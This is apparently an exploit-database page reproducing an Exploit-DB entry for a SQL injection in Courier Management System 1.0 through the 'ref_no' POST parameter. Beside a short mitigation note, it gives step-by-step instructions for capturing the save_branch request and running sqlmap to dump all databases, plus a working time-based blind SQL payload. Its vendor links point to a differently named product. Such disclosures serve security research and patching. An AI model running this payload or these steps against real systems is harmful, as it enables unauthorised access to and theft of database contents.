header-logo
Suggest Exploit
vendor:
Courier Management System
by:
Zhaiyi (Zeo)
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Courier Management System
Affected Version From: Version 1
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2020

Courier Management System 1.0 – ‘ref_no’ SQL Injection

The 'ref_no' parameter in the Courier Management System 1.0 is vulnerable to SQL Injection. By manipulating the 'ref_no' parameter in the request to the '/ajax.php?action=save_branch' page, an attacker can execute arbitrary SQL queries and potentially retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries or prepared statements to handle user input and ensure that input is properly validated and sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form  , click on save
Step 5. Capture the request of the ""/ajax.php?action=save_branch"" page inburpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents

---
Parameter: ref_no (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND
'knst'='knst
---

Navigation

Suggest Exploit

Services By CQR